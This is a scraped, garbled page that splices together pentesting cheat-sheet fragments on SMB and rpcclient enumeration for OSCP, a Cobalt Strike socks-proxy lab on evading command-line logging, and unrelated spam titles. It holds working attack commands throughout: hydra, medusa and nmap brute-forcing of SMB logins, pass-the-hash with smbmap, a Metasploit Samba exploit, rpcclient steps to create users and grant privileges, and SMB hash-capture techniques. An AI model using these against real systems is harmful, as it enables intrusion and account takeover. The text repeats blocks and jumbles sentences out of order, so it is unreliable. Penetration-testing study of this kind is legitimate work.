While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. PORT STATE SERVICE First one - two Cobalt Strike sessions: Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing: {% code-tabs %} INet~Services <1c> - M S-1-5-21-1835020781-2383529660-3657267081-1005 LEWISFAMILY\kmem (2) lookupnames Convert names to SIDs The article is focused on Red Teamers but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. After verifying that the privilege was added using the lsaenumprivaccount command, we removed the privileges from the user using the lsaremoveacctrights command. Initial Access. rewardone in the PWK forums posted a neat script to easily get Samba versions: When you run this on a box running Samba, you get results: When in doubt, we can check the smb version in PCAP. In this communication, the child process can make requests from a parent process. adddriver Add a print driver It contains contents from other blogs for my quick reference, * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan), masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports, ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//'), nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A, (performs full scan instead of syn-scan to prevent getting flagged by firewalls), From Apache Version to finding Ubuntu version -> ubuntu httpd versions, : Private key that is used for login. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1006 New Folder (9) D 0 Sun Dec 13 05:26:59 2015 # lines. Forbid the creation and modification of files? With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. If proper privileges are assigned it also possible to delete a user using the rpcclient. querygroupmem Query group membership REG The createdomgroup command is to be used to create a group. samlogon Sam Logon certcube provides a detailed guide of oscp enumeration with step by step oscp enumeration cheatsheet. There was a Forced Logging off on the Server and other important information. All this can be observed in the usage of the lsaenumprivaccount command. Replication READ ONLY great when smbclient doesnt work, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work, smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q, # Requires root or enough permissions to use tcpdump, # Will listen for the first 7 packets of a null login, # Will sometimes not capture or will print multiple. | Type: STYPE_DISKTREE_HIDDEN We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. C$ NO ACCESS How I Won 90 Days OSCP Lab Voucher for Free, https://github.com/s0wr0b1ndef/OSCP-note/, These notes are not in the context of any machines I had during the OSCP lab or exam. shutdownabort Abort Shutdown (over shutdown pipe) result was NT_STATUS_NONE_MAPPED. *' # download everything recursively in the wwwroot share to /usr/share/smbmap. Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds. S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2) Connect to wwwroot share (try blank password), Nmap scans for SMB vulnerabilities (NB: can cause DoS), Enumerate SNMP device (places info in readable format), Enumerate file privileges (see here for discussion of file_priv), Check if current user superuser (on = yes, off = no), Check users privileges over table (pg_shadow). setform Set form As with the previous commands, the share enumeration command also comes with the feature to target a specific entity. Using rpcclient it is possible to create a group. Get help on commands setprinter Set printer comment S-1-5-21-1835020781-2383529660-3657267081-1015 LEWISFAMILY\bin (2) The tool is written in Perl and is basically . dfsenum Enumerate dfs shares --------------- ---------------------- lsaenumsid Enumerate the LSA SIDS Created with Xmind. Guest access disabled by default. openprinter Open printer handle With --pw-nt-hash, the pwd provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without folder it list everything. oscp pwk enumeration smb nmblookup smbclient rpcclient nmap enum4linux smbmap When using the enumdomgroup we see that we have different groups with their respective RID and when this RID is used with the queryusergroups it reveals information about that particular holder or RID. netname: IPC$ NETLOGON getdriver Get print driver information so lets run rpcclient with no options to see what's available: SegFault:~ cg$ rpcclient. Since we performed enumeration on different users, it is only fair to extend this to various groups as well. If these kinds of features are not enabled on the domain, then it is possible to brute force the credentials on the domain. [Original] As Ive been working through PWK/OSCP for the last month, one thing Ive noticed is that enumeration of SMB is tricky, and different tools fail / succeed on different hosts. Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. Cracking Password. Hence, the credentials were successfully enumerated and the account can be taken over now. rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. smbclient (null session) enum4linux. This is what happens - attacker (10.0.0.5) uses proxychains with impacket's reg utility to retrieve the hostname of the box at 10.0.0.7 (WS02) via the compromised (CS beacon) box 10.0.0.2 (WS01): keyName hklm\system\currentcontrolset\control\computername\computername. [+] User SMB session establishd on [ip] We will shine the light on the process or methodology for enumerating SMB services on the Target System/Server in this article. One of the first enumeration commands to be demonstrated here is the srvinfo command. . -k, --kerberos Use kerberos (active directory) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004 It contains contents from other blogs for my quick reference -?, --help Show this help message Active Directory & Kerberos Abuse. | Anonymous access: Password attack (Brute-force) Brute-force service password. | execute arbitrary code via certain crafted "RPC related requests" aka the "RRAS Memory Corruption Vulnerability." logonctrl2 Logon Control 2 SYSVOL NO ACCESS, [+] Finding open SMB ports. Reconnecting with SMB1 for workgroup listing. Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). enumdrivers Enumerate installed printer drivers Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services . (MS)RPC. 445/tcp open microsoft-ds path: C:\tmp samquerysecobj Query SAMR security object The next command that can be used is enumalsgroups. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi, if [ ! | Type: STYPE_DISKTREE This information includes the Group Name, Description, Attributes, and the number of members in that group. Many groups are created for a specific service. S-1-5-21-1835020781-2383529660-3657267081-500 LEWISFAMILY\Administrator (1) So, it is also a good way to enumerate what kind of services might be running on the server, this can be done using enumdomgroup. list List available commands on You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv. After establishing the connection, to get the grasp of various commands that can be used you can run the help. It enumerates alias groups on the domain. | Anonymous access: | \\[ip]\share: Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. Using rpcclient we can enumerate usernames on those OSs just like a windows OS. Enum4linux is a Linux alternative to enum.exe and is used to enumerate data from Windows and Samba hosts. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000 S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2) *', # download everything recursively in the wwwroot share to /usr/share/smbmap. This can be obtained by running the lsaenumsid command. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME), # returns NT_STATUS_ACCESS_DENIED or even gives you a session. Passing the SID as a parameter in the lsacreateaccount command will enable us as an attacker to create an account object as shown in the image below. It is also possible to add and remove privileges to a specific user as well. sinkdata Sink data | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370 Author: Pavandeep Singhis a Technical Writer, Researcher, and Penetration Tester. remark: IPC Service (Mac OS X) SeSecurityPrivilege 0:8 (0x0:0x8) After manipulating the Privileges on the different users and groups it is possible to enumerate the values of those specific privileges for a particular user using the lsalookupprivvalue command. great when smbclient doesnt work *[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &, echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null, # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv, msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run, msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run, Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016, nmap -p 445 $ip --script=smb-vuln-ms17-010, hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb, smbclient \\\\192.168.1.105\\ipc$ -U john. queryusergroups Query user groups deleteform Delete form It is possible to enumerate the SAM data through the rpcclient as well. It is a software protocol that allows applications, PCs, and Desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. [hostname] <00> - M result was NT_STATUS_NONE_MAPPED The main application area of the protocol has been the, operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed. SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V Adding it to the original post. During our previous demonstrations, we were able to enumerate the permissions and privileges of users and groups based on the RID of that particular user. to access through Web; FTP to file upload ==> Execute from web == webshell ; Password Checking if you found with other enum. lsaquerysecobj Query LSA security object S-1-5-21-1835020781-2383529660-3657267081-1002 LEWISFAMILY\daemon (1) result was NT_STATUS_NONE_MAPPED It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether. Host script results: An attacker can create an account object based on the SID of that user. May need to run a second time for success. S-1-5-21-1835020781-2383529660-3657267081-1009 LEWISFAMILY\tty (2) enumports Enumerate printer ports method. Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 The ability to manipulate a user doesnt end with creating a user or changing the password of a user. SRVSVC There are times where these share folders may contain sensitive or Confidential information that can be used to compromise the target. Most secure. -s, --configfile=CONFIGFILE Use alternative configuration file | Current user access: READ/WRITE The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: Which are used by some browsers and tools (like Skype), From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html, Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. It accepts the group name as a parameter. | Current user access: This command helps the attacker enumerate the security objects or permissions and privileges related to the security as demonstrated below. | References: | Type: STYPE_IPC_HIDDEN 1. There are multiple methods to connect to a remote RPC service. MAC Address = 00-50-56-XX-XX-XX, [+] Finding open SMB ports. This article can serve as a reference for Red Team activists for attacking and enumerating the domain but it can also be helpful for the Blue Team to understand and test the measures applied on the domain to protect the Network and its users. During that time, the designers of the rpcclient might be clueless about the importance of this tool as a penetration testing tool. IPC$ IPC Remote IPC with a RID:[0x457] Hex 0x457 would = decimal. # Search the file in recursive mode and download it inside /usr/share/smbmap, #Download everything to current directory, mask: specifies the mask which is used to filter the files within the directory (e.g. "" Thus it might be worth a short to try to manually connect to a share. --------------- ---------------------- | Risk factor: HIGH | smb-vuln-ms17-010: . This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. | Current user access: This will help in getting the information such as the kind of password policies that have been enforced by the Administrator in the domain. . lsaaddacctrights Add rights to an account | smb-vuln-ms06-025: rpcclient $> lookupnames lewis -c, --command=COMMANDS Execute semicolon separated cmds The below shows traffic captures that illustrate that the box 10.0.0.2 enumerates 10.0.0.7 using SMB traffic only: Below further proves that the box 10.0.0.2 (WS01 which acted as proxy) did not generate any sysmon logs and the target box 10.0.0.7 (WS02) logged a couple of events, that most likely would not attract much attention from the blue teams: Note how only the SMB traffic between the compromised system and the DC is generated, but no new processes are spawned by the infected. To enumerate these shares the attacker can use netshareenum on the rpcclient. rpcclient is a part of the Samba suite on Linux distributions. getprintprocdir Get print processor directory At this point in time, if you can use anonymous sessions, then there are some very useful commands within the tool. It can be observed that the os version seems to be 10.0. After that command was run, rpcclient will give you the most excellent "rpcclient> " prompt. --usage Display brief usage message, Common samba options: It can be enumerated through rpcclient using the lsaenumsid command. While having some privileges it is also possible to create a user within the domain using the rpcclient. It can be done with the help of the createdomuser command with the username that you want to create as a parameter. This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). This detail includes the path of the share, remarks, it will indicate if the share has a password for access, it will tell the number of users accessing the share and what kind of access is allowed on the share. It is possible to target the group using the RID that was extracted while running the enumdomgroup. When dealing with SMB an attacker is bound to be dealt with the Network Shares on the Domain. # lines. On most Linuxes, we have tab auto-complete of commands, which extends into rpcclient commands. echoaddone Add one to a number [+] User SMB session establishd on [ip] It also includes the commands that I used on platforms such as Vulnhub and Hack the Box. getprinter Get printer info This command retrieves the domain, server, users on the system, and other relevant information. rpcclient $> help This command can help with the enumeration of the LSA Policy for that particular domain. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository. Similarly to enumerate the Primary Domain Information such as the Role of the machine, Native more of the Domain can be done using the dsroledominfo command as demonstrated. |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ -U, --user=USERNAME Set the network username In the demonstration, the user with RID 0x1f4 was enumerated regarding their password properties. Assumes valid machine account to this domain controller. If Im missing something, leave a comment. D 0 Thu Sep 27 16:26:00 2018 To enumerate the Password Properties on the domain, the getdompwinfo command can be used. lsaremoveacctrights Remove rights from an account dsenumdomtrusts Enumerate all trusted domains in an AD forest . Enter WORKGROUP\root's password: Checklist - Local Windows Privilege Escalation, Pentesting JDWP - Java Debug Wire Protocol, 161,162,10161,10162/udp - Pentesting SNMP, 515 - Pentesting Line Printer Daemon (LPD), 548 - Pentesting Apple Filing Protocol (AFP), 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP, 1433 - Pentesting MSSQL - Microsoft SQL Server, 1521,1522-1529 - Pentesting Oracle TNS Listener, 2301,2381 - Pentesting Compaq/HP Insight Manager, 3690 - Pentesting Subversion (svn server), 4369 - Pentesting Erlang Port Mapper Daemon (epmd), 8009 - Pentesting Apache JServ Protocol (AJP), 8333,18333,38333,18444 - Pentesting Bitcoin, 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream), 10000 - Pentesting Network Data Management Protocol (ndmp), 24007,24008,24009,49152 - Pentesting GlusterFS, 50030,50060,50070,50075,50090 - Pentesting Hadoop, Reflecting Techniques - PoCs and Polygloths CheatSheet, Dangling Markup - HTML scriptless injection, HTTP Request Smuggling / HTTP Desync Attack, Regular expression Denial of Service - ReDoS, Server Side Inclusion/Edge Side Inclusion Injection, XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations), Pentesting CI/CD (Github, Jenkins, Terraform), Windows Exploiting (Basic Guide - OSCP lvl), INE Courses and eLearnSecurity Certifications Reviews, Stealing Sensitive Information Disclosure from a Web, Enumerate Users, Groups & Logged On Users, Manually enumerate windows shares and connect to them, .
Does Jeff Pegues Have A Voice Issue,
Pythagorean Theorem Worksheet Grade 8 Pdf Answer Key,
Is Princeville Resort Open,
Articles R
